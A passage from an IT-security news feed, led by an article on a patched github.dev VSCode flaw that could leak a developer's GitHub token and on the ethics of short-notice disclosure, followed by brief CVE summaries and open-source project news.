<pubDate>Thu, 04 Jun 2026 03:52:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A vulnerability in GitHub’s browser-based VSCode editor could lead to the theft of a developer’s token under certain circumstances, says a researcher.</p>



<p>The issue, revealed this week in a blog by <a href="https://ammaraskar.com/" target="_blank" rel="noreferrer noopener">Ammar Askar</a>, has apparently been already addressed by GitHub owner Microsoft. But it raises a questions about both DevOps security, and about the researcher’s allegation that, because Microsoft doesn’t treat bug discoveries seriously, he can justify giving it short notice before openly publishing vulnerabilities he finds.</p>



<p>First, the bug: Users of <em>github.com</em> may not realize it, but when they are on any repository, they can shift to <em>github.dev</em> and its browser-based version of VSCode just by changing the URL. </p>



<p>Why do this? Because the browser instance of VSCode is pretty powerful, Askar says in his blog. “You can view all the files in the repo (even if it’s a private one), you can send out pull requests, and even make commits.”</p>



<p><a href="https://www.linkedin.com/in/rob-enderle-03729/" target="_blank" rel="noreferrer noopener">Rob Enderle</a>, a IT consultant who heads the Enderle Group, agrees that jumping into VSCode this way is “an incredibly useful tactical tool for quick tasks. By just hitting the ‘.’ key in any GitHub repo, you instantly get a browser-based VS Code interface without having to clone gigabytes of data locally. It’s perfect for rapid PR reviews, quick documentation edits, or navigating code on the fly without breaking your workflow. Just keep in mind that it runs entirely in the browser sandbox; there’s no compute backend, no terminal, and no code execution.”</p>



<p>For any heavy lifting or actual compiling, he added, the developer will still need the raw compute of a local workstation, or a full cloud environment like Codespaces.</p>



<p>The problem, Askar says, is that this functionality is achieved by <em>github.com</em> POSTing over an OAuth token to <em>github.dev</em> that allows it to interact with GitHub on your behalf. “The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to,” he wrote in the blog.</p>



<p>“The presence of this token, and the fact that this web app is running almost the entire brunt of VSCode’s million line Typescript codebase, makes it a great target for anyone looking into VSCode bugs,” he wrote.</p>



<h2 class="wp-block-heading">The exploit</h2>



<p>Askar said that a threat actor could install an extension in a repository using a Jupyter notebook, a web application for creating and sharing computational documents that has the ability to install a malicious local workspace extension while skipping the publisher trust check. In his proof of concept, Askar said that once his payload runs, the newly installed extension will grab the GitHub API token, run a query to get the private repos the developer has access to, and then print out the replies and the token.</p>



<p>This vulnerability also exists in the desktop version of VSCode, Askar said, though it’s harder to exploit, since a threat actor would need to convince the victim to clone their repo and open the notebook containing the webview script payload. “Of course,” he added, “if you [the hacker] had some other XSS [cross-site scripting attack] in a webview that you can get a victim to open, you get effectively full RCE [remote code execution] on their computer.”</p>



<p>In an email, he said this vulnerability was “about as serious as it gets. Any website on the internet could have redirected you to a <em>github.dev</em> link that could have provided an attacker a token to read and modify your code repos. If one could convince the maintainer of a popular software project to click a link, they could have made whatever modifications they wanted to their project.”</p>



<p>This means, said Enderle, “we have to start treating developer endpoints with strict, isolated, zero-trust parameters, because we clearly cannot rely on vendor complacency to protect us.”</p>



<p>This issue reinforces the point that you should never follow any links unless you know exactly where they will take you, added <a href="https://www.linkedin.com/in/dwaynemcdaniel/" target="_blank" rel="noreferrer noopener">Dwayne McDaniel</a>, principal developer advocate at GitGuardian.</p>



<h2 class="wp-block-heading">Short notice</h2>



<p>Here’s where things get complicated. Because of an unhappy experience when disclosing a previous VSCode vulnerability to Microsoft — the bug was fixed, but Askar wasn’t given credit — this time he only gave GitHub one hour notice that this new discovery was going to be published. Microsoft applied what <a href="https://github.com/microsoft/vscode/pull/319705" target="_blank" rel="noreferrer noopener">Askar calls a “stopgap” fix</a> by adding a confirmation when a developer opens notebooks in web VSCode, and by not allowing the <em>trusted publisher</em> requirement to be skipped by commands.</p>



<p><strong>[Related content: <a href="https://www.csoonline.com/article/4124766/when-responsible-disclosure-becomes-unpaid-labor.html" target="_blank">When responsible disclosure becomes unpaid labor</a>]</strong></p>



<h2 class="wp-block-heading">An ethical question</h2>



<p>Askar’s short notice raises an ethical question: How far in advance should a responsible researcher give notice to a vendor about a vulnerability before publicly revealing it?</p>



<p>These days, most infosec pros agree that notice <em>must</em> be given, or else a threat actor can quickly exploit a hole. Not only that, but the researcher risks damage to their reputation if reasonable notice isn’t given. Experienced researchers often give vendors at least 30 days to create and distribute a patch.</p>



<p>For their part, vendors often create bug bounty programs, or partner with bug bounty programs, to reward researchers for their work. Unfortunately, some vendors don’t always credit researchers, or downplay the damage a vulnerability can cause. In fact, last month Microsoft and a prominent cybersecurity researcher <a href="https://www.csoonline.com/article/4178869/microsoft-and-security-researchers-dueling-posts-about-cybersecurity-disclosures-get-nasty.html" target="_blank">got into a public spat</a> about one such alleged incident.</p>



<h2 class="wp-block-heading">An imbalance of power</h2>



<p>Asked for comment about Askar’s most recent discovery, a Microsoft spokesperson said, “we value the critical role that the security research community plays in strengthening the security of our products, services, and the broader technology ecosystem. While independent researchers determine when and how to publish their findings, we remain committed to rapidly assessing reported issues, mobilizing the appropriate engineering and security response resources, and delivering mitigations, guidance, and protections as quickly as possible to help safeguard our customers.”</p>



<p><strong>[Related content: <a href="https://www.csoonline.com/article/3491353/is-the-vulnerability-disclosure-process-a-glitch-in-itself-how-cisos-are-being-left-in-the-dark.html" target="_blank">Is the vulnerability disclosure process glitched?</a>]</strong></p>



<p>There is a balance between coordinating disclosure with a software vendor (CVD) and full disclosure, Askar told us. But, he added, there’s an imbalance of power. “A security researcher can pour countless hours into an issue, ensuring they develop a good proof of concept and provide all the steps to recreate the issue. With this, they hope to at least get an acknowledgement for their efforts, which they can use to further their security track record or, in the best case, a monetary bounty reward.”</p>



<p>However, he added, “If security vendors don’t adhere to their side of the bargain, public disclosure is one of the few options security researchers have (if they don’t want to sit on their vulnerabilities or sell them on the black market). It forces the vendor to acknowledge the security issue publicly and usually leads to a much faster resolution than any private communication would.”</p>



<p>This, said Enderle, creates problems for enterprises: “When vendor bureaucracy penalizes responsible disclosure, it alienates the security community and forces public zero-day drops, ultimately leaving enterprise customers holding the bag.”</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4180925/hole-in-githubs-browser-based-vscode-editor-could-lead-to-stolen-token.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-6684 | GST Electronics inohom Nova Panel N7 up to 1.9.9.6 authentication bypass]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in GST Electronics inohom Nova Panel N7 up to 1.9.9.6. Impacted is an unknown function. The manipulation results in authentication bypass using alternate channel. This vulnerability only affects products that are no longer supported by the mainta...]]></description>
<link>https://tsecurity.de/de/3570975/sicherheitsluecken/cve-2024-6684-gst-electronics-inohom-nova-panel-n7-up-to-1996-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570975/sicherheitsluecken/cve-2024-6684-gst-electronics-inohom-nova-panel-n7-up-to-1996-authentication-bypass/</guid>
<pubDate>Thu, 04 Jun 2026 00:24:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/gst_electronics:inohom_nova_panel_n7">GST Electronics inohom Nova Panel N7 up to 1.9.9.6</a>. Impacted is an unknown function. The manipulation results in authentication bypass using alternate channel. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-6684">CVE-2024-6684</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-1202 | XPodas Octopod prior 1.0 authentication bypass]]></title>
<description><![CDATA[A vulnerability was found in XPodas Octopod. It has been declared as very critical. This vulnerability affects unknown code. The manipulation results in authentication bypass by primary weakness. This vulnerability only affects products that are no longer supported by the maintainer.

This vulner...]]></description>
<link>https://tsecurity.de/de/3570478/sicherheitsluecken/cve-2024-1202-xpodas-octopod-prior-10-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570478/sicherheitsluecken/cve-2024-1202-xpodas-octopod-prior-10-authentication-bypass/</guid>
<pubDate>Wed, 03 Jun 2026 20:06:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/xpodas:octopod">XPodas Octopod</a>. It has been declared as <a href="https://vuldb.com/kb/risk">very critical</a>. This vulnerability affects unknown code. The manipulation results in authentication bypass by primary weakness. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2024-1202">CVE-2024-1202</a>. The attack can be executed remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49143 | browserstack browserstack-runner up to 0.9.5 HTTP /_log vm.runInNewContext code injection (GHSA-6vr3-7wcx-v5g5 / EUVD-2026-34029)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in browserstack browserstack-runner up to 0.9.5. Affected by this vulnerability is the function vm.runInNewContext of the file /_log of the component HTTP Handler. The manipulation leads to code injection. This vulnerability only affects pr...]]></description>
<link>https://tsecurity.de/de/3570317/sicherheitsluecken/cve-2026-49143-browserstack-browserstack-runner-up-to-095-http-log-vmruninnewcontext-code-injection-ghsa-6vr3-7wcx-v5g5-euvd-2026-34029/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570317/sicherheitsluecken/cve-2026-49143-browserstack-browserstack-runner-up-to-095-http-log-vmruninnewcontext-code-injection-ghsa-6vr3-7wcx-v5g5-euvd-2026-34029/</guid>
<pubDate>Wed, 03 Jun 2026 18:39:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/browserstack:browserstack-runner">browserstack browserstack-runner up to 0.9.5</a>. Affected by this vulnerability is the function <code>vm.runInNewContext</code> of the file <em>/_log</em> of the component <em>HTTP Handler</em>. The manipulation leads to code injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-49143">CVE-2026-49143</a>. The attack can only be initiated within the local network. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Open-source security is not a solo activity]]></title>
<description><![CDATA[Over time, many open-source maintainers face the same problem: they
lack the time to do all of the work that their project needs, and no
one else is stepping up to provide adequate help. Maintainers, though,
are often reluctant to throw in the towel. The result is suboptimal
all around; the maint...]]></description>
<link>https://tsecurity.de/de/3570068/linux-tipps/open-source-security-is-not-a-solo-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570068/linux-tipps/open-source-security-is-not-a-solo-activity/</guid>
<pubDate>Wed, 03 Jun 2026 17:10:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Over time, many open-source maintainers face the same problem: they
lack the time to do all of the work that their project needs, and no
one else is stepping up to provide adequate help. Maintainers, though,
are often reluctant to throw in the towel. The result is suboptimal
all around; the maintainer is stressed out, project quality suffers,
and users face security risks that they may not be fully aware of. At
the 2026 <a href="https://events.linuxfoundation.org/open-source-summit-north-america/">Open
Source Summit North America</a>, Robin Bender Ginn spoke about this
problem, when it might be time for maintainers to pass the torch, and
the responsibilities of users.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-6921 | NAC Telecommunication Systems NACPremium up to 01082024 cleartext storage]]></title>
<description><![CDATA[A vulnerability was found in NAC Telecommunication Systems NACPremium up to 01082024 and classified as problematic. Impacted is an unknown function. The manipulation results in cleartext storage of sensitive information. This vulnerability only affects products that are no longer supported by the...]]></description>
<link>https://tsecurity.de/de/3569981/sicherheitsluecken/cve-2024-6921-nac-telecommunication-systems-nacpremium-up-to-01082024-cleartext-storage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569981/sicherheitsluecken/cve-2024-6921-nac-telecommunication-systems-nacpremium-up-to-01082024-cleartext-storage/</guid>
<pubDate>Wed, 03 Jun 2026 16:39:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/nac_telecommunication_systems:nacpremium">NAC Telecommunication Systems NACPremium up to 01082024</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function. The manipulation results in cleartext storage of sensitive information. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2024-6921">CVE-2024-6921</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-6919 | NAC Telecommunication Systems NACPremium up to 01082024 sql injection]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in NAC Telecommunication Systems NACPremium up to 01082024. This vulnerability affects unknown code. Executing a manipulation can lead to sql injection. This vulnerability only affects products that are no longer supported by the mainta...]]></description>
<link>https://tsecurity.de/de/3569979/sicherheitsluecken/cve-2024-6919-nac-telecommunication-systems-nacpremium-up-to-01082024-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569979/sicherheitsluecken/cve-2024-6919-nac-telecommunication-systems-nacpremium-up-to-01082024-sql-injection/</guid>
<pubDate>Wed, 03 Jun 2026 16:39:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/nac_telecommunication_systems:nacpremium">NAC Telecommunication Systems NACPremium up to 01082024</a>. This vulnerability affects unknown code. Executing a manipulation can lead to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2024-6919">CVE-2024-6919</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-6920 | NAC Telecommunication Systems NACPremium up to 01082024 cross site scripting]]></title>
<description><![CDATA[A vulnerability has been found in NAC Telecommunication Systems NACPremium up to 01082024 and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. This vulnerability only affects products that are no longer supported by the maintai...]]></description>
<link>https://tsecurity.de/de/3569978/sicherheitsluecken/cve-2024-6920-nac-telecommunication-systems-nacpremium-up-to-01082024-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569978/sicherheitsluecken/cve-2024-6920-nac-telecommunication-systems-nacpremium-up-to-01082024-cross-site-scripting/</guid>
<pubDate>Wed, 03 Jun 2026 16:39:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/nac_telecommunication_systems:nacpremium">NAC Telecommunication Systems NACPremium up to 01082024</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing. The manipulation leads to cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2024-6920">CVE-2024-6920</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tridgell: rsync and outrage]]></title>
<description><![CDATA[Andrew Tridgell has written a blog
post responding to complaints that he has begun using LLM tools in
his work maintaining rsync:


Like many developers of open source packages I've been hit by a
flood of security reports lately in my role as the rsync
maintainer. Many of those reports are AI gen...]]></description>
<link>https://tsecurity.de/de/3569653/linux-tipps/tridgell-rsync-and-outrage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569653/linux-tipps/tridgell-rsync-and-outrage/</guid>
<pubDate>Wed, 03 Jun 2026 15:06:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Andrew Tridgell has written a <a href="https://medium.com/@tridge60/rsync-and-outrage-d9849599e5a0">blog
post</a> responding to complaints that he has begun using LLM tools in
his work maintaining <a href="https://rsync.samba.org/">rsync</a>:</p>

<blockquote class="bq">
<p>Like many developers of open source packages I've been hit by a
flood of security reports lately in my role as the rsync
maintainer. Many of those reports are AI generated (not all though,
there are some notable ones with very careful and high quality manual
analysis).</p>

<p>As this flood started to get more intense I realised I needed to
raise the defences on rsync a lot — we needed much more thorough test
suites, code coverage analysis, CI testing on a lot more platforms,
deliberate and thorough scanning for possible security issues (so I
find at least some of them before other people!) and the addition of a
whole lot of defence-in-depth hardening techniques.</p>

<p>[...] Now to the future, because we're not done yet by a long
shot. The security reports keep rolling in. I'm working on a bunch of
CVEs right now. Luckily I've been joined by some other very good
developers with great systems development skills and security
knowledge. Some of these people came to my attention partly because of
all the rage happening at the moment, so I get some rage storm clouds
have silver linings. Watch out for some credits for some great new
rsync developers in the next release.</p>
</blockquote>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Caching for extended attributes]]></title>
<description><![CDATA[Extended
attributes (xattrs) provide a way to attach key/value metadata to
inodes—files, directories, and the like—in a filesystem.  As with many
Linux filesystems, the FUSE filesystem
supports xattrs.  In a filesystem-track session at the 2026 Linux Storage,
Filesystem, Memory Management, and BP...]]></description>
<link>https://tsecurity.de/de/3567319/linux-tipps/caching-for-extended-attributes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567319/linux-tipps/caching-for-extended-attributes/</guid>
<pubDate>Tue, 02 Jun 2026 20:38:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://man7.org/linux/man-pages/man7/xattr.7.html">Extended
attributes</a> (xattrs) provide a way to attach <span class="nobreak">key/value</span> metadata to
inodes—files, directories, and the like—in a filesystem.  As with many
Linux filesystems, the <a href="https://docs.kernel.org/filesystems/fuse/">FUSE filesystem</a>
supports xattrs.  In a filesystem-track session at the 2026 <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a>, FUSE maintainer Miklos
Szeredi led a discussion about caching xattrs in kernel memory; he would
like to create some common infrastructure that could be used by FUSE and
shared with other filesystems.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-8732 | libxml2 up to 2.14.5 xmlcatalog xmlParseSGMLCatalog recursion (Issue 958 / EUVD-2025-24001)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in libxml2 up to 2.14.5. The impacted element is the function xmlParseSGMLCatalog of the component xmlcatalog. Performing a manipulation results in uncontrolled recursion.

This vulnerability is reported as CVE-2025-8732. The attack require...]]></description>
<link>https://tsecurity.de/de/3567043/sicherheitsluecken/cve-2025-8732-libxml2-up-to-2145-xmlcatalog-xmlparsesgmlcatalog-recursion-issue-958-euvd-2025-24001/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567043/sicherheitsluecken/cve-2025-8732-libxml2-up-to-2145-xmlcatalog-xmlparsesgmlcatalog-recursion-issue-958-euvd-2025-24001/</guid>
<pubDate>Tue, 02 Jun 2026 19:09:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/libxml2">libxml2 up to 2.14.5</a>. The impacted element is the function <code>xmlParseSGMLCatalog</code> of the component <em>xmlcatalog</em>. Performing a manipulation results in uncontrolled recursion.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2025-8732">CVE-2025-8732</a>. The attack requires a local approach. Moreover, an exploit is present.

The real existence of this vulnerability is still doubted at the moment.

The code maintainer explains, that "[t]he issue can only be triggered with untrusted SGML catalogs and it makes absolutely no sense to use untrusted catalogs. I also doubt that anyone is still using SGML catalogs at all."]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: Launching the Rust Foundation Maintainers Fund]]></title>
<description><![CDATA[If you want to financially support the development of Rust, please consider donating to the Rust Foundation Maintainers Fund.

A few months ago, the Rust Foundation announced the Rust Foundation Maintainers Fund (RFMF). Since then, the Rust Project has been closely cooperating with the Rust Found...]]></description>
<link>https://tsecurity.de/de/3567033/tools/the-rust-programming-language-blog-launching-the-rust-foundation-maintainers-fund/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567033/tools/the-rust-programming-language-blog-launching-the-rust-foundation-maintainers-fund/</guid>
<pubDate>Tue, 02 Jun 2026 19:09:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<blockquote>
<p>If you want to financially support the development of Rust, please consider <a href="https://github.com/sponsors/rustfoundation" rel="external">donating</a> to the Rust Foundation Maintainers Fund.</p>
</blockquote>
<p>A few months ago, the Rust Foundation announced the <a href="https://rustfoundation.org/media/announcing-the-rust-foundation-maintainers-fund/" rel="external">Rust Foundation Maintainers Fund</a> (RFMF). Since then, the Rust Project has been closely cooperating with the Rust Foundation to determine how exactly this fund will be used to support Rust maintainers. This resulted in the acceptance of <a href="https://rust-lang.github.io/rfcs/3931-rfmf-rust-foundation-maintainer-fund.html" rel="external">RFC #3931</a>, which established the <a href="https://rust-lang.org/governance/teams/launching-pad/#team-funding" rel="external">Funding team</a> and the <a href="https://rust-lang.github.io/rfcs/3931-rfmf-rust-foundation-maintainer-fund.html#expectations-placed-on-maintainers-in-residence" rel="external">Maintainer in Residence</a> program.</p>
<p>The primary goal of the Funding team is to ensure that maintainers who work on Rust and its toolchain will be properly supported. We will talk to Rust Project members to figure out their funding situation, meet Rust team leads to learn about their maintenance needs, approach companies to find opportunities for them to invest into Rust by supporting Rust maintainers, coordinate various funding efforts and ensure that the beneficial effects of funded maintenance are visibly promoted, with the help of the <a href="https://rust-lang.org/governance/teams/launching-pad/#team-content" rel="external">Content team</a>.</p>
<p><a href="https://rust-lang.github.io/rfcs/3931-rfmf-rust-foundation-maintainer-fund.html#expectations-placed-on-maintainers-in-residence" rel="external">Maintainer in Residence</a> is a new program dedicated to financially supporting existing Rust Project maintainers<sup class="footnote-reference"><a href="https://blog.rust-lang.org/2026/06/02/launching-the-rust-foundation-maintainers-fund/#fn-dir">1</a></sup>. Each Maintainer in Residence will be funded to <a href="https://blog.rust-lang.org/inside-rust/2026/01/12/what-is-maintenance-anyway/" rel="external">maintain</a> one or more critical parts of Rust, such as the compiler, the standard library, Cargo, Clippy or one of many other projects that the Rust Project develops and maintains. The funded work will include activities such as performing large-scale refactorings, code reviews, unblocking new features, issue triaging, mentoring other contributors and more, and will be split between priorities guided by the teams they are supporting and priorities of their own choosing within the Project. Where applicable, Maintainers in Residence are also encouraged to propose, champion, and drive forward <a href="https://rust-lang.github.io/rust-project-goals/" rel="external">Rust Project Goals</a>.</p>
<p>The goal of this program is to provide stable and long-term funding so that maintainers can focus on important work that ensures the long-term health of Rust. The funding team will select Maintainers in Residence based on funding availability and maintenance needs within the Rust Project, and help ensure that they are successful. We expect that this will usually be a (near) full-time position, but that will depend on the nature of the work and the area of maintenance.</p>
<p>This program extends our existing support for Rust maintainers, such as the <a href="https://blog.rust-lang.org/inside-rust/2026/04/09/program-management-update-2026-03/" rel="external">program management program</a> and the <a href="https://blog.rust-lang.org/inside-rust/2025/06/05/a-glance-at-the-team-compiler-operations" rel="external">compiler-ops program</a>. An important development is that we now have a centralized <a href="https://github.com/sponsors/rustfoundation" rel="external">mechanism</a> for gathering donations from both individuals and companies, and a dedicated team that will help direct those funds to specific maintainers. You can find more details about the funding team and the Maintainer in Residence program in the <a href="https://rust-lang.github.io/rfcs/3931-rfmf-rust-foundation-maintainer-fund.html" rel="external">RFC</a>.</p>
<p>We expect to hire the first Maintainer in Residence in the upcoming months and announce it on this blog, so stay tuned!</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/02/launching-the-rust-foundation-maintainers-fund/#how-to-contribute-funds"></a>
How to contribute funds</h3>
<p>If you are an individual who wants to help Rust succeed and thrive, you can donate to the RFMF through <a href="https://github.com/sponsors/rustfoundation" rel="external">GitHub Sponsors</a><sup class="footnote-reference"><a href="https://blog.rust-lang.org/2026/06/02/launching-the-rust-foundation-maintainers-fund/#fn-sponsors">2</a></sup>. Companies who would like to invest in better maintenance of Rust can also donate through GitHub Sponsors or they can contact the Rust Foundation <a href="mailto:contact@rustfoundation.org">directly</a>.</p>
<p>The important thing is that <strong>all proceeds from this fund will be directly used to support Rust Project maintainers</strong>. We currently expect that to happen primarily through the Maintainer in Residence program, but it can also be done in the form of smaller-scale grants or other mechanisms, as determined by the Funding team. We will figure this out on the go, as this is also quite new for us.</p>
<p>We really appreciate each donation, however small, because with more money we can hire more maintainers to ensure that we can continue to develop Rust and that important improvements are not blocked on maintenance tasks. This is especially important at this time, where Rust is starting to get used more and more in the industry in various application areas, which increases the need for sustained maintenance. The importance of multiple funding sources is underscored by an unfortunate trend we currently observe, where key Rust maintainers are losing their funding for Rust work due to budget shifts. The Rust Foundation Maintainers Fund is designed to provide stable funding for Rust maintainers that is less dependent on sudden shifts in the job market and the IT industry.</p>
<p>As with most things, there is no one-size-fits-all solution, so there are multiple ways to support Rust financially. The <a href="https://rustnl.org/maintainers" rel="external">RustNL Maintainers Team</a> recently hired several Rust Project maintainers. Previously, we <a href="https://blog.rust-lang.org/2025/12/08/making-it-easier-to-sponsor-rust-contributors/" rel="external">wrote</a> about how you can support specific individuals working on Rust. And there are also Rust Project Goals <a href="https://rust-lang.github.io/rust-project-goals/2026/funding.html" rel="external">in search of funding</a>. We welcome all efforts that can help support Rust Project maintainers, who often do work that is near invisible and thankless, while at the same time incredibly important and necessary, on a volunteer basis.</p>
<p>Thank you for considering sponsoring the development and maintenance of Rust! You can find more information about funding Rust on our <a href="https://rust-lang.org/funding/" rel="external">Funding page</a>.</p>
<section class="footnotes">
<ol class="footnotes-list">
<li>
<p>This program was inspired by the <a href="https://www.python.org/psf/developersinresidence/" rel="external">Developer in Residence</a> concept used by the Python Software Foundation (PSF), with which we led several helpful discussions. Thank you, PSF! <a href="https://blog.rust-lang.org/2026/06/02/launching-the-rust-foundation-maintainers-fund/#fr-dir-1">↩</a></p>
</li>
<li>
<p>Note that the fact that GitHub Sponsors is currently enabled on the <code>rustfoundation</code> GitHub organization, and not the <code>rust-lang</code> organization, is an implementation detail that might change in the future. All donations raised on this Sponsors page will be routed to the Rust Foundation Maintainers Fund and will be spent on directly supporting Rust Project maintainers. <a href="https://blog.rust-lang.org/2026/06/02/launching-the-rust-foundation-maintainers-fund/#fr-sponsors-1">↩</a></p>
</li>
</ol>
</section>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-9477 | AirTies Air4443 up to 1.6.1.6 cross site scripting]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in AirTies Air4443 up to 1.6.1.6. This affects an unknown function. Executing a manipulation can lead to cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/3565934/sicherheitsluecken/cve-2024-9477-airties-air4443-up-to-1616-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565934/sicherheitsluecken/cve-2024-9477-airties-air4443-up-to-1616-cross-site-scripting/</guid>
<pubDate>Tue, 02 Jun 2026 13:38:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/airties:air4443">AirTies Air4443 up to 1.6.1.6</a>. This affects an unknown function. Executing a manipulation can lead to cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2024-9477">CVE-2024-9477</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-10035 | BG-TEK Informatics Security Technologies CoslatV3 up to 3.1069 code injection]]></title>
<description><![CDATA[A vulnerability has been found in BG-TEK Informatics Security Technologies CoslatV3 up to 3.1069 and classified as critical. Affected is an unknown function. This manipulation causes code injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vul...]]></description>
<link>https://tsecurity.de/de/3565811/sicherheitsluecken/cve-2024-10035-bg-tek-informatics-security-technologies-coslatv3-up-to-31069-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565811/sicherheitsluecken/cve-2024-10035-bg-tek-informatics-security-technologies-coslatv3-up-to-31069-code-injection/</guid>
<pubDate>Tue, 02 Jun 2026 13:08:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/bg-tek_informatics_security_technologies:coslatv3">BG-TEK Informatics Security Technologies CoslatV3 up to 3.1069</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function. This manipulation causes code injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2024-10035">CVE-2024-10035</a>. The attack needs to be launched locally. No exploit is available.]]></content:encoded>
</item>
<item>
